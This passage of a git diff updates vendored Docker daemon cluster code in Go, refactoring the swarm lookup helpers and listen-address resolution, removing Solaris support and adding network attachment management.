-		rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{Names: []string{input}}})
-
-		if err != nil || len(rl.Nodes) == 0 {
-			// If any error or 0 result, ListNodes to match via ID prefix.
-			rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{IDPrefixes: []string{input}}})
-		}
-
-		if err != nil {
-			return nil, err
-		}
+	if rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}); err == nil {
+		return rg.Node, nil
+	}
 
-		if len(rl.Nodes) == 0 {
-			return nil, fmt.Errorf("node %s not found", input)
-		}
+	// If any error (including NotFound), ListNodes to match via full name.
+	rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{
+		Filters: &swarmapi.ListNodesRequest_Filters{
+			Names: []string{input},
+		},
+	})
+	if err != nil || len(rl.Nodes) == 0 {
+		// If any error or 0 result, ListNodes to match via ID prefix.
+		rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{
+			Filters: &swarmapi.ListNodesRequest_Filters{
+				IDPrefixes: []string{input},
+			},
+		})
+	}
+	if err != nil {
+		return nil, err
+	}
 
-		if l := len(rl.Nodes); l > 1 {
-			return nil, fmt.Errorf("node %s is ambiguous (%d matches found)", input, l)
-		}
+	if len(rl.Nodes) == 0 {
+		err := fmt.Errorf("node %s not found", input)
+		return nil, errdefs.NotFound(err)
+	}
 
-		return rl.Nodes[0], nil
+	if l := len(rl.Nodes); l > 1 {
+		return nil, errdefs.InvalidParameter(fmt.Errorf("node %s is ambiguous (%d matches found)", input, l))
 	}
-	return rg.Node, nil
+
+	return rl.Nodes[0], nil
 }
 
-func getService(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Service, error) {
+func getService(ctx context.Context, c swarmapi.ControlClient, input string, insertDefaults bool) (*swarmapi.Service, error) {
 	// GetService to match via full ID.
-	rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input})
-	if err != nil {
-		// If any error (including NotFound), ListServices to match via full name.
-		rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{Names: []string{input}}})
-		if err != nil || len(rl.Services) == 0 {
-			// If any error or 0 result, ListServices to match via ID prefix.
-			rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{IDPrefixes: []string{input}}})
-		}
+	if rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input, InsertDefaults: insertDefaults}); err == nil {
+		return rg.Service, nil
+	}
 
-		if err != nil {
-			return nil, err
-		}
+	// If any error (including NotFound), ListServices to match via full name.
+	rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{
+		Filters: &swarmapi.ListServicesRequest_Filters{
+			Names: []string{input},
+		},
+	})
+	if err != nil || len(rl.Services) == 0 {
+		// If any error or 0 result, ListServices to match via ID prefix.
+		rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{
+			Filters: &swarmapi.ListServicesRequest_Filters{
+				IDPrefixes: []string{input},
+			},
+		})
+	}
+	if err != nil {
+		return nil, err
+	}
 
-		if len(rl.Services) == 0 {
-			return nil, fmt.Errorf("service %s not found", input)
-		}
+	if len(rl.Services) == 0 {
+		err := fmt.Errorf("service %s not found", input)
+		return nil, errdefs.NotFound(err)
+	}
 
-		if l := len(rl.Services); l > 1 {
-			return nil, fmt.Errorf("service %s is ambiguous (%d matches found)", input, l)
-		}
+	if l := len(rl.Services); l > 1 {
+		return nil, errdefs.InvalidParameter(fmt.Errorf("service %s is ambiguous (%d matches found)", input, l))
+	}
 
+	if !insertDefaults {
 		return rl.Services[0], nil
 	}
-	return rg.Service, nil
+
+	rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: rl.Services[0].ID, InsertDefaults: true})
+	if err == nil {
+		return rg.Service, nil
+	}
+	return nil, err
 }
 
 func getTask(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Task, error) {
 	// GetTask to match via full ID.
-	rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input})
+	if rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}); err == nil {
+		return rg.Task, nil
+	}
+
+	// If any error (including NotFound), ListTasks to match via full name.
+	rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{
+		Filters: &swarmapi.ListTasksRequest_Filters{
+			Names: []string{input},
+		},
+	})
+	if err != nil || len(rl.Tasks) == 0 {
+		// If any error or 0 result, ListTasks to match via ID prefix.
+		rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{
+			Filters: &swarmapi.ListTasksRequest_Filters{
+				IDPrefixes: []string{input},
+			},
+		})
+	}
 	if err != nil {
-		// If any error (including NotFound), ListTasks to match via full name.
-		rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{Names: []string{input}}})
+		return nil, err
+	}
 
-		if err != nil || len(rl.Tasks) == 0 {
-			// If any error or 0 result, ListTasks to match via ID prefix.
-			rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{IDPrefixes: []string{input}}})
-		}
+	if len(rl.Tasks) == 0 {
+		err := fmt.Errorf("task %s not found", input)
+		return nil, errdefs.NotFound(err)
+	}
 
-		if err != nil {
-			return nil, err
-		}
+	if l := len(rl.Tasks); l > 1 {
+		return nil, errdefs.InvalidParameter(fmt.Errorf("task %s is ambiguous (%d matches found)", input, l))
+	}
 
-		if len(rl.Tasks) == 0 {
-			return nil, fmt.Errorf("task %s not found", input)
-		}
+	return rl.Tasks[0], nil
+}
 
-		if l := len(rl.Tasks); l > 1 {
-			return nil, fmt.Errorf("task %s is ambiguous (%d matches found)", input, l)
-		}
+func getSecret(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Secret, error) {
+	// attempt to lookup secret by full ID
+	if rg, err := c.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: input}); err == nil {
+		return rg.Secret, nil
+	}
 
-		return rl.Tasks[0], nil
+	// If any error (including NotFound), ListSecrets to match via full name.
+	rl, err := c.ListSecrets(ctx, &swarmapi.ListSecretsRequest{
+		Filters: &swarmapi.ListSecretsRequest_Filters{
+			Names: []string{input},
+		},
+	})
+	if err != nil || len(rl.Secrets) == 0 {
+		// If any error or 0 result, ListSecrets to match via ID prefix.
+		rl, err = c.ListSecrets(ctx, &swarmapi.ListSecretsRequest{
+			Filters: &swarmapi.ListSecretsRequest_Filters{
+				IDPrefixes: []string{input},
+			},
+		})
+	}
+	if err != nil {
+		return nil, err
 	}
-	return rg.Task, nil
+
+	if len(rl.Secrets) == 0 {
+		err := fmt.Errorf("secret %s not found", input)
+		return nil, errdefs.NotFound(err)
+	}
+
+	if l := len(rl.Secrets); l > 1 {
+		return nil, errdefs.InvalidParameter(fmt.Errorf("secret %s is ambiguous (%d matches found)", input, l))
+	}
+
+	return rl.Secrets[0], nil
+}
+
+func getConfig(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Config, error) {
+	// attempt to lookup config by full ID
+	if rg, err := c.GetConfig(ctx, &swarmapi.GetConfigRequest{ConfigID: input}); err == nil {
+		return rg.Config, nil
+	}
+
+	// If any error (including NotFound), ListConfigs to match via full name.
+	rl, err := c.ListConfigs(ctx, &swarmapi.ListConfigsRequest{
+		Filters: &swarmapi.ListConfigsRequest_Filters{
+			Names: []string{input},
+		},
+	})
+	if err != nil || len(rl.Configs) == 0 {
+		// If any error or 0 result, ListConfigs to match via ID prefix.
+		rl, err = c.ListConfigs(ctx, &swarmapi.ListConfigsRequest{
+			Filters: &swarmapi.ListConfigsRequest_Filters{
+				IDPrefixes: []string{input},
+			},
+		})
+	}
+	if err != nil {
+		return nil, err
+	}
+
+	if len(rl.Configs) == 0 {
+		err := fmt.Errorf("config %s not found", input)
+		return nil, errdefs.NotFound(err)
+	}
+
+	if l := len(rl.Configs); l > 1 {
+		return nil, errdefs.InvalidParameter(fmt.Errorf("config %s is ambiguous (%d matches found)", input, l))
+	}
+
+	return rl.Configs[0], nil
+}
+
+func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) {
+	// GetNetwork to match via full ID.
+	if rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}); err == nil {
+		return rg.Network, nil
+	}
+
+	// If any error (including NotFound), ListNetworks to match via ID prefix and full name.
+	rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{
+		Filters: &swarmapi.ListNetworksRequest_Filters{
+			Names: []string{input},
+		},
+	})
+	if err != nil || len(rl.Networks) == 0 {
+		rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{
+			Filters: &swarmapi.ListNetworksRequest_Filters{
+				IDPrefixes: []string{input},
+			},
+		})
+	}
+	if err != nil {
+		return nil, err
+	}
+
+	if len(rl.Networks) == 0 {
+		return nil, fmt.Errorf("network %s not found", input)
+	}
+
+	if l := len(rl.Networks); l > 1 {
+		return nil, errdefs.InvalidParameter(fmt.Errorf("network %s is ambiguous (%d matches found)", input, l))
+	}
+
+	return rl.Networks[0], nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go
index c24d4865b3..e1ebfec8df 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go
@@ -1,18 +1,19 @@
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
 
 import (
-	"errors"
 	"fmt"
 	"net"
 )
 
-var (
-	errNoSuchInterface         = errors.New("no such interface")
-	errNoIP                    = errors.New("could not find the system's IP address")
-	errMustSpecifyListenAddr   = errors.New("must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified")
-	errBadListenAddr           = errors.New("listen address must be an IP address or network interface (with optional port number)")
-	errBadAdvertiseAddr        = errors.New("advertise address must be a non-zero IP address or network interface (with optional port number)")
-	errBadDefaultAdvertiseAddr = errors.New("default advertise address must be a non-zero IP address or network interface (without a port number)")
+const (
+	errNoSuchInterface         configError = "no such interface"
+	errNoIP                    configError = "could not find the system's IP address"
+	errMustSpecifyListenAddr   configError = "must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified"
+	errBadNetworkIdentifier    configError = "must specify a valid IP address or interface name"
+	errBadListenAddr           configError = "listen address must be an IP address or network interface (with optional port number)"
+	errBadAdvertiseAddr        configError = "advertise address must be a non-zero IP address or network interface (with optional port number)"
+	errBadDataPathAddr         configError = "data path address must be a non-zero IP address or network interface (without a port number)"
+	errBadDefaultAdvertiseAddr configError = "default advertise address must be a non-zero IP address or network interface (without a port number)"
 )
 
 func resolveListenAddr(specifiedAddr string) (string, string, error) {
@@ -20,23 +21,17 @@ func resolveListenAddr(specifiedAddr string) (string, string, error) {
 	if err != nil {
 		return "", "", fmt.Errorf("could not parse listen address %s", specifiedAddr)
 	}
-
 	// Does the host component match any of the interface names on the
 	// system? If so, use the address from that interface.
-	interfaceAddr, err := resolveInterfaceAddr(specifiedHost)
-	if err == nil {
-		return interfaceAddr.String(), specifiedPort, nil
-	}
-	if err != errNoSuchInterface {
+	specifiedIP, err := resolveInputIPAddr(specifiedHost, true)
+	if err != nil {
+		if err == errBadNetworkIdentifier {
+			err = errBadListenAddr
+		}
 		return "", "", err
 	}
 
-	// If it's not an interface, it must be an IP (for now)
-	if net.ParseIP(specifiedHost) == nil {
-		return "", "", errBadListenAddr
-	}
-
-	return specifiedHost, specifiedPort, nil
+	return specifiedIP.String(), specifiedPort, nil
 }
 
 func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (string, string, error) {
@@ -57,43 +52,32 @@ func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (st
 			advertiseHost = advertiseAddr
 			advertisePort = listenAddrPort
 		}
-
 		// Does the host component match any of the interface names on the
 		// system? If so, use the address from that interface.
-		interfaceAddr, err := resolveInterfaceAddr(advertiseHost)
-		if err == nil {
-			return interfaceAddr.String(), advertisePort, nil
-		}
-		if err != errNoSuchInterface {
+		advertiseIP, err := resolveInputIPAddr(advertiseHost, false)
+		if err != nil {
+			if err == errBadNetworkIdentifier {
+				err = errBadAdvertiseAddr
+			}
 			return "", "", err
 		}
 
-		// If it's not an interface, it must be an IP (for now)
-		if ip := net.ParseIP(advertiseHost); ip == nil || ip.IsUnspecified() {
-			return "", "", errBadAdvertiseAddr
-		}
-
-		return advertiseHost, advertisePort, nil
+		return advertiseIP.String(), advertisePort, nil
 	}
 
 	if c.config.DefaultAdvertiseAddr != "" {
 		// Does the default advertise address component match any of the
 		// interface names on the system? If so, use the address from
 		// that interface.
-		interfaceAddr, err := resolveInterfaceAddr(c.config.DefaultAdvertiseAddr)
-		if err == nil {
-			return interfaceAddr.String(), listenAddrPort, nil
-		}
-		if err != errNoSuchInterface {
+		defaultAdvertiseIP, err := resolveInputIPAddr(c.config.DefaultAdvertiseAddr, false)
+		if err != nil {
+			if err == errBadNetworkIdentifier {
+				err = errBadDefaultAdvertiseAddr
+			}
 			return "", "", err
 		}
 
-		// If it's not an interface, it must be an IP (for now)
-		if ip := net.ParseIP(c.config.DefaultAdvertiseAddr); ip == nil || ip.IsUnspecified() {
-			return "", "", errBadDefaultAdvertiseAddr
-		}
-
-		return c.config.DefaultAdvertiseAddr, listenAddrPort, nil
+		return defaultAdvertiseIP.String(), listenAddrPort, nil
 	}
 
 	systemAddr, err := c.resolveSystemAddr()
@@ -103,6 +87,22 @@ func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (st
 	return systemAddr.String(), listenAddrPort, nil
 }
 
+func resolveDataPathAddr(dataPathAddr string) (string, error) {
+	if dataPathAddr == "" {
+		// dataPathAddr is not defined
+		return "", nil
+	}
+	// If a data path flag is specified try to resolve the IP address.
+	dataPathIP, err := resolveInputIPAddr(dataPathAddr, false)
+	if err != nil {
+		if err == errBadNetworkIdentifier {
+			err = errBadDataPathAddr
+		}
+		return "", err
+	}
+	return dataPathIP.String(), nil
+}
+
 func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) {
 	// Use a specific interface's IP address.
 	intf, err := net.InterfaceByName(specifiedInterface)
@@ -124,13 +124,13 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) {
 			if ipAddr.IP.To4() != nil {
 				// IPv4
 				if interfaceAddr4 != nil {
-					return nil, fmt.Errorf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP)
+					return nil, configError(fmt.Sprintf("interface %s has more than one IPv4 address (%s and %s)", specifiedInterface, interfaceAddr4, ipAddr.IP))
 				}
 				interfaceAddr4 = ipAddr.IP
 			} else {
 				// IPv6
 				if interfaceAddr6 != nil {
-					return nil, fmt.Errorf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP)
+					return nil, configError(fmt.Sprintf("interface %s has more than one IPv6 address (%s and %s)", specifiedInterface, interfaceAddr6, ipAddr.IP))
 				}
 				interfaceAddr6 = ipAddr.IP
 			}
@@ -138,7 +138,7 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) {
 	}
 
 	if interfaceAddr4 == nil && interfaceAddr6 == nil {
-		return nil, fmt.Errorf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface)
+		return nil, configError(fmt.Sprintf("interface %s has no usable IPv4 or IPv6 address", specifiedInterface))
 	}
 
 	// In the case that there's exactly one IPv4 address
@@ -149,6 +149,30 @@ func resolveInterfaceAddr(specifiedInterface string) (net.IP, error) {
 	return interfaceAddr6, nil
 }
 
+// resolveInputIPAddr tries to resolve the IP address from the string passed as input
+// - tries to match the string as an interface name, if so returns the IP address associated with it
+// - on failure of previous step tries to parse the string as an IP address itself
+//	 if succeeds returns the IP address
+func resolveInputIPAddr(input string, isUnspecifiedValid bool) (net.IP, error) {
+	// Try to see if it is an interface name
+	interfaceAddr, err := resolveInterfaceAddr(input)
+	if err == nil {
+		return interfaceAddr, nil
+	}
+	// String matched interface but there is a potential ambiguity to be resolved
+	if err != errNoSuchInterface {
+		return nil, err
+	}
+
+	// String is not an interface check if it is a valid IP
+	if ip := net.ParseIP(input); ip != nil && (isUnspecifiedValid || !ip.IsUnspecified()) {
+		return ip, nil
+	}
+
+	// Not valid IP found
+	return nil, errBadNetworkIdentifier
+}
+
 func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) {
 	// Use the system's only IP address, or fail if there are
 	// multiple addresses to choose from. Skip interfaces which
@@ -162,8 +186,7 @@ func (c *Cluster) resolveSystemAddrViaSubnetCheck() (net.IP, error) {
 	var systemInterface string
 
 	// List Docker-managed subnets
-	v4Subnets := c.config.NetworkSubnetsProvider.V4Subnets()
-	v6Subnets := c.config.NetworkSubnetsProvider.V6Subnets()
+	v4Subnets, v6Subnets := c.config.NetworkSubnetsProvider.Subnets()
 
 ifaceLoop:
 	for _, intf := range interfaces {
@@ -272,7 +295,7 @@ func listSystemIPs() []net.IP {
 
 func errMultipleIPs(interfaceA, interfaceB string, addrA, addrB net.IP) error {
 	if interfaceA == interfaceB {
-		return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB)
+		return configError(fmt.Sprintf("could not choose an IP address to advertise since this system has multiple addresses on interface %s (%s and %s)", interfaceA, addrA, addrB))
 	}
-	return fmt.Errorf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB)
+	return configError(fmt.Sprintf("could not choose an IP address to advertise since this system has multiple addresses on different interfaces (%s on %s and %s on %s)", addrA, interfaceA, addrB, interfaceB))
 }
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go
index 3d4f239bda..62e4f61a65 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go
@@ -1,6 +1,4 @@
-// +build linux
-
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
 
 import (
 	"net"
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go
index 4e845f5c8f..fe75848e57 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go
@@ -1,6 +1,6 @@
-// +build !linux,!solaris
+// +build !linux
 
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
 
 import "net"
 
diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go
deleted file mode 100644
index 57a894b251..0000000000
--- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go
+++ /dev/null
@@ -1,57 +0,0 @@
-package cluster
-
-import (
-	"bufio"
-	"fmt"
-	"net"
-	"os/exec"
-	"strings"
-)
-
-func (c *Cluster) resolveSystemAddr() (net.IP, error) {
-	defRouteCmd := "/usr/sbin/ipadm show-addr -p -o addr " +
-		"`/usr/sbin/route get default | /usr/bin/grep interface | " +
-		"/usr/bin/awk '{print $2}'`"
-	out, err := exec.Command("/usr/bin/bash", "-c", defRouteCmd).Output()
-	if err != nil {
-		return nil, fmt.Errorf("cannot get default route: %v", err)
-	}
-
-	defInterface := strings.SplitN(string(out), "/", 2)
-	defInterfaceIP := net.ParseIP(defInterface[0])
-
-	return defInterfaceIP, nil
-}
-
-func listSystemIPs() []net.IP {
-	var systemAddrs []net.IP
-	cmd := exec.Command("/usr/sbin/ipadm", "show-addr", "-p", "-o", "addr")
-	cmdReader, err := cmd.StdoutPipe()
-	if err != nil {
-		return nil
-	}
-
-	if err := cmd.Start(); err != nil {
-		return nil
-	}
-
-	scanner := bufio.NewScanner(cmdReader)
-	go func() {
-		for scanner.Scan() {
-			text := scanner.Text()
-			nameAddrPair := strings.SplitN(text, "/", 2)
-			// Let go of loopback interfaces and docker interfaces
-			systemAddrs = append(systemAddrs, net.ParseIP(nameAddrPair[0]))
-		}
-	}()
-
-	if err := scanner.Err(); err != nil {
-		fmt.Printf("scan underwent err: %+v\n", err)
-	}
-
-	if err := cmd.Wait(); err != nil {
-		fmt.Printf("run command wait: %+v\n", err)
-	}
-
-	return systemAddrs
-}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/networks.go b/vendor/github.com/docker/docker/daemon/cluster/networks.go
new file mode 100644
index 0000000000..b8e31baa11
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/networks.go
@@ -0,0 +1,316 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"context"
+	"fmt"
+
+	apitypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/runconfig"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// GetNetworks returns all current cluster managed networks.
+func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) {
+	list, err := c.getNetworks(nil)
+	if err != nil {
+		return nil, err
+	}
+	removePredefinedNetworks(&list)
+	return list, nil
+}
+
+func removePredefinedNetworks(networks *[]apitypes.NetworkResource) {
+	if networks == nil {
+		return
+	}
+	var idxs []int
+	for i, n := range *networks {
+		if v, ok := n.Labels["com.docker.swarm.predefined"]; ok && v == "true" {
+			idxs = append(idxs, i)
+		}
+	}
+	for i, idx := range idxs {
+		idx -= i
+		*networks = append((*networks)[:idx], (*networks)[idx+1:]...)
+	}
+}
+
+func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+
+	state := c.currentNodeState()
+	if !state.IsActiveManager() {
+		return nil, c.errNoManager(state)
+	}
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	r, err := state.controlClient.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters})
+	if err != nil {
+		return nil, err
+	}
+
+	networks := make([]apitypes.NetworkResource, 0, len(r.Networks))
+
+	for _, network := range r.Networks {
+		networks = append(networks, convert.BasicNetworkFromGRPC(*network))
+	}
+
+	return networks, nil
+}
+
+// GetNetwork returns a cluster network by an ID.
+func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) {
+	var network *swarmapi.Network
+
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		n, err := getNetwork(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+		network = n
+		return nil
+	}); err != nil {
+		return apitypes.NetworkResource{}, err
+	}
+	return convert.BasicNetworkFromGRPC(*network), nil
+}
+
+// GetNetworksByName returns cluster managed networks by name.
+// It is ok to have multiple networks here. #18864
+func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) {
+	// Note that swarmapi.GetNetworkRequest.Name is not functional.
+	// So we cannot just use that with c.GetNetwork.
+	return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{
+		Names: []string{name},
+	})
+}
+
+func attacherKey(target, containerID string) string {
+	return containerID + ":" + target
+}
+
+// UpdateAttachment signals the attachment config to the attachment
+// waiter who is trying to start or attach the container to the
+// network.
+func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error {
+	c.mu.Lock()
+	attacher, ok := c.attachers[attacherKey(target, containerID)]
+	if !ok || attacher == nil {
+		c.mu.Unlock()
+		return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target)
+	}
+	if attacher.inProgress {
+		logrus.Debugf("Discarding redundant notice of resource allocation on network %s for task id %s", target, attacher.taskID)
+		c.mu.Unlock()
+		return nil
+	}
+	attacher.inProgress = true
+	c.mu.Unlock()
+
+	attacher.attachWaitCh <- config
+
+	return nil
+}
+
+// WaitForDetachment waits for the container to stop or detach from
+// the network.
+func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error {
+	c.mu.RLock()
+	attacher, ok := c.attachers[attacherKey(networkName, containerID)]
+	if !ok {
+		attacher, ok = c.attachers[attacherKey(networkID, containerID)]
+	}
+	state := c.currentNodeState()
+	if state.swarmNode == nil || state.swarmNode.Agent() == nil {
+		c.mu.RUnlock()
+		return errors.New("invalid cluster node while waiting for detachment")
+	}
+
+	c.mu.RUnlock()
+	agent := state.swarmNode.Agent()
+	if ok && attacher != nil &&
+		attacher.detachWaitCh != nil &&
+		attacher.attachCompleteCh != nil {
+		// Attachment may be in progress still so wait for
+		// attachment to complete.
+		select {
+		case <-attacher.attachCompleteCh:
+		case <-ctx.Done():
+			return ctx.Err()
+		}
+
+		if attacher.taskID == taskID {
+			select {
+			case <-attacher.detachWaitCh:
+			case <-ctx.Done():
+				return ctx.Err()
+			}
+		}
+	}
+
+	return agent.ResourceAllocator().DetachNetwork(ctx, taskID)
+}
+
+// AttachNetwork generates an attachment request towards the manager.
+func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) {
+	aKey := attacherKey(target, containerID)
+	c.mu.Lock()
+	state := c.currentNodeState()
+	if state.swarmNode == nil || state.swarmNode.Agent() == nil {
+		c.mu.Unlock()
+		return nil, errors.New("invalid cluster node while attaching to network")
+	}
+	if attacher, ok := c.attachers[aKey]; ok {
+		c.mu.Unlock()
+		return attacher.config, nil
+	}
+
+	agent := state.swarmNode.Agent()
+	attachWaitCh := make(chan *network.NetworkingConfig)
+	detachWaitCh := make(chan struct{})
+	attachCompleteCh := make(chan struct{})
+	c.attachers[aKey] = &attacher{
+		attachWaitCh:     attachWaitCh,
+		attachCompleteCh: attachCompleteCh,
+		detachWaitCh:     detachWaitCh,
+	}
+	c.mu.Unlock()
+
+	ctx, cancel := c.getRequestContext()
+	defer cancel()
+
+	taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses)
+	if err != nil {
+		c.mu.Lock()
+		delete(c.attachers, aKey)
+		c.mu.Unlock()
+		return nil, fmt.Errorf("Could not attach to network %s: %v", target, err)
+	}
+
+	c.mu.Lock()
+	c.attachers[aKey].taskID = taskID
+	close(attachCompleteCh)
+	c.mu.Unlock()
+
+	logrus.Debugf("Successfully attached to network %s with task id %s", target, taskID)
+
+	release := func() {
+		ctx, cancel := c.getRequestContext()
+		defer cancel()
+		if err := agent.ResourceAllocator().DetachNetwork(ctx, taskID); err != nil {
+			logrus.Errorf("Failed remove network attachment %s to network %s on allocation failure: %v",
+				taskID, target, err)
+		}
+	}
+
+	var config *network.NetworkingConfig
+	select {
+	case config = <-attachWaitCh:
+	case <-ctx.Done():
+		release()
+		return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err())
+	}
+
+	c.mu.Lock()
+	c.attachers[aKey].config = config
+	c.mu.Unlock()
+
+	logrus.Debugf("Successfully allocated resources on network %s for task id %s", target, taskID)
+
+	return config, nil
+}
+
+// DetachNetwork unblocks the waiters waiting on WaitForDetachment so
+// that a request to detach can be generated towards the manager.
+func (c *Cluster) DetachNetwork(target string, containerID string) error {
+	aKey := attacherKey(target, containerID)
+
+	c.mu.Lock()
+	attacher, ok := c.attachers[aKey]
+	delete(c.attachers, aKey)
+	c.mu.Unlock()
+
+	if !ok {
+		return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target)
+	}
+
+	close(attacher.detachWaitCh)
+	return nil
+}
+
+// CreateNetwork creates a new cluster managed network.
+func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) {
+	if runconfig.IsPreDefinedNetwork(s.Name) {
+		err := notAllowedError(fmt.Sprintf("%s is a pre-defined network and cannot be created", s.Name))
+		return "", errors.WithStack(err)
+	}
+
+	var resp *swarmapi.CreateNetworkResponse
+	if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		networkSpec := convert.BasicNetworkCreateToGRPC(s)
+		r, err := state.controlClient.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec})
+		if err != nil {
+			return err
+		}
+		resp = r
+		return nil
+	}); err != nil {
+		return "", err
+	}
+
+	return resp.Network.ID, nil
+}
+
+// RemoveNetwork removes a cluster network.
+func (c *Cluster) RemoveNetwork(input string) error {
+	return c.lockedManagerAction(func(ctx context.Context, state nodeState) error {
+		network, err := getNetwork(ctx, state.controlClient, input)
+		if err != nil {
+			return err
+		}
+
+		_, err = state.controlClient.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID})
+		return err
+	})
+}
+
+func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error {
+	// Always prefer NetworkAttachmentConfigs from TaskTemplate
+	// but fallback to service spec for backward compatibility
+	networks := s.TaskTemplate.Networks
+	if len(networks) == 0 {
+		networks = s.Networks
+	}
+	for i, n := range networks {
+		apiNetwork, err := getNetwork(ctx, client, n.Target)
+		if err != nil {
+			ln, _ := c.config.Backend.FindNetwork(n.Target)
+			if ln != nil && runconfig.IsPreDefinedNetwork(ln.Name()) {
+				// Need to retrieve the corresponding predefined swarm network
+				// and use its id for the request.
+				apiNetwork, err = getNetwork(ctx, client, ln.Name())
